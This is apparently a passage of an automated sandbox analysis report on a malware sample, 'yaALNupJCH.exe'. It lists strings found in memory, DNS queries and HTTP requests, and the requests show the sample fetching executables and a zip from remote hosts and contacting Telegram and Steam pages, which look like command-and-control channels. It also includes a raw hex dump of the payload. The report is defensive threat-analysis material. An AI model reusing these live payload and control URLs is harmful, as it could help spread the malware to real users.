                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.141.41.12/n9kd3X/index.phpx/svchost.exerd
                                Source: yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001581000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315724068.0000000001581000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.0000000001584000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.0000000001580000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://95.P
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: yaALNupJCH.exe, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                                Source: yaALNupJCH.exe, 00000000.00000003.882874525.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399333427.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399082122.0000000000400000.00000040.00000400.00020000.00000000.sdmp, svchost[1].exe.0.drString found in binary or memory: http://geoplugin.net/json.gp/C
                                Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpPrg
                                Source: yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp_
                                Source: yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                                Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpon
                                Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpp
                                Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpp8
                                Source: yaALNupJCH.exe, 00000000.00000002.1399167458.000000000156E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/
                                Source: yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377001563.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.php
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.php1mb3JtLXVybGVuY29kZWQ=
                                Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.php:A
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpHb
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpNq
                                Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171038808.000000000155D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpOn
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpPb
                                Source: yaALNupJCH.exe, 00000000.00000003.1353888271.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpcoded
                                Source: yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpcodedRq
                                Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279492013.000000000155C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpded
                                Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpdq
                                Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000150F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000150E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000150F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpk
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phpodq
                                Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phprg
                                Source: yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/g9ecOb3jd/index.phptc
                                Source: yaALNupJCH.exe, 00000000.00000003.1353892271.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1171005042.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1353866017.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1279466486.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302613093.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302659925.0000000001574000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025833709.000000000156E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025867465.0000000001573000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mardukoff.info/kd3X/index.php
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pixcode.com.mx/svchost.exe
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pixcode.com.mx/svchost.exe4g
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pixcode.com.mx/svchost.exeV
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pixcode.com.mx/svchost.exeat
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pixcode.com.mx/svchost.exerd
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pixcode.com.mx/svchost.exews;
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pixcode.com.mx/svchost.exexg
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transdi.org/host.exe
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transdi.org/host.exe3jd/index.php0c
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transdi.org/host.exe5
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transdi.org/host.exe8
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transdi.org/host.exe=o
                                Source: yaALNupJCH.exe, 00000000.00000003.1315748710.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1025890323.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000154F000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000154F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transdi.org/host.exeMo
                                Source: yaALNupJCH.exe, 00000000.00000003.887098483.0000000001564000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transdi.org/host.exeZ
                                Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://transdi.org/svchost.dll
                                Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                                Source: yaALNupJCH.exe, 00000003.00000002.910275456.000000000E973000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                                Source: 12600711246403711407151220.3.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                Source: 12600711246403711407151220.3.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                Source: 51372752844971756591089692.3.dr, 40080133769305826732791000.3.drString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BBD4EA3DA
                                Source: 12600711246403711407151220.3.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                Source: 12600711246403711407151220.3.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.drString found in binary or memory: https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
                                Source: yaALNupJCH.exe, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199555780195
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.drString found in binary or memory: https://steamcommunity.com/profiles/76561199555780195update.zipopenopen_NULL%s
                                Source: yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
                                Source: yaALNupJCH.exe, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.drString found in binary or memory: https://t.me/solonichat
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/solonichatCA
                                Source: yaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/solonichatMA
                                Source: yaALNupJCH.exe, 00000000.00000003.886566380.0000000007F7B000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907271529.0000000000400000.00000040.00000400.00020000.00000000.sdmp, host[1].exe.0.dr, svchost[1].dll.0.dr, svchost.dll.0.drString found in binary or memory: https://t.me/solonichatcolo1dtemp.zipMozilla/5.0
                                Source: yaALNupJCH.exe, 00000003.00000002.908666904.0000000002BB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/solonichatwF
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003870000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drString found in binary or memory: https://www.ecosia.org/newtab/
                                Source: yaALNupJCH.exe, 00000003.00000002.909197492.0000000003905000.00000004.00000020.00020000.00000000.sdmp, 23870232221971761076349822.3.dr, 12600711246403711407151220.3.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                Source: yaALNupJCH.exe, 00000003.00000002.910498852.000000000EEB6000.00000004.00000020.00020000.00000000.sdmp, 51372752844971756591089692.3.dr, 40080133769305826732791000.3.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/
                                Source: yaALNupJCH.exe, 00000003.00000003.895202513.000000000EBBC000.00000004.00000020.00020000.00000000.sdmp, 51372752844971756591089692.3.dr, 40080133769305826732791000.3.drString found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
                                Source: 40080133769305826732791000.3.drString found in binary or memory: https://www.google.com/search?q=.net
                                Source: 40080133769305826732791000.3.drString found in binary or memory: https://www.google.com/setprefs?sig=0_d7toVxfMKzFj4yeYEy5xHRJrV_I%3D&source=en_ignored_notification&
                                Source: 40080133769305826732791000.3.drString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8.1%26oq%3D
                                Source: unknownDNS traffic detected: queries for: mardukoff.info
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CBE2B0 InternetCloseHandle,InternetOpenA,InternetOpenUrlA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,Sleep,std::_Xinvalid_argument,0_2_00CBE2B0
                                Source: global trafficHTTP traffic detected: GET /solonichat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; x64 rv:107.0) Gecko / 20100101 Firefox / 107.0Host: t.me
                                Source: global trafficHTTP traffic detected: GET /svchost.dll HTTP/1.1Host: transdi.org
                                Source: global trafficHTTP traffic detected: GET /svchost.exe HTTP/1.1Host: pixcode.com.mx
                                Source: global trafficHTTP traffic detected: GET /host.exe HTTP/1.1Host: transdi.org
                                Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /40eaa63b296d256c2181f079611d421f HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333
                                Source: global trafficHTTP traffic detected: GET /temp.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36Host: 116.202.2.169:1333Cache-Control: no-cache
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
                                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 28 Sep 2023 04:01:58 GMTContent-Type: application/zipContent-Length: 2685679Last-Modified: Mon, 12 Sep 2022 13:14:59 GMTConnection: keep-aliveETag: "631f30d3-28faef"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 81.19.131.36
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 81.19.131.36
                                Source: unknownTCP traffic detected without corresponding DNS query: 81.19.131.36
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 81.19.131.36
                                Source: unknownTCP traffic detected without corresponding DNS query: 81.19.131.36
                                Source: unknownTCP traffic detected without corresponding DNS query: 81.19.131.36
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
                                Source: unknownTCP traffic detected without corresponding DNS query: 95.141.41.12
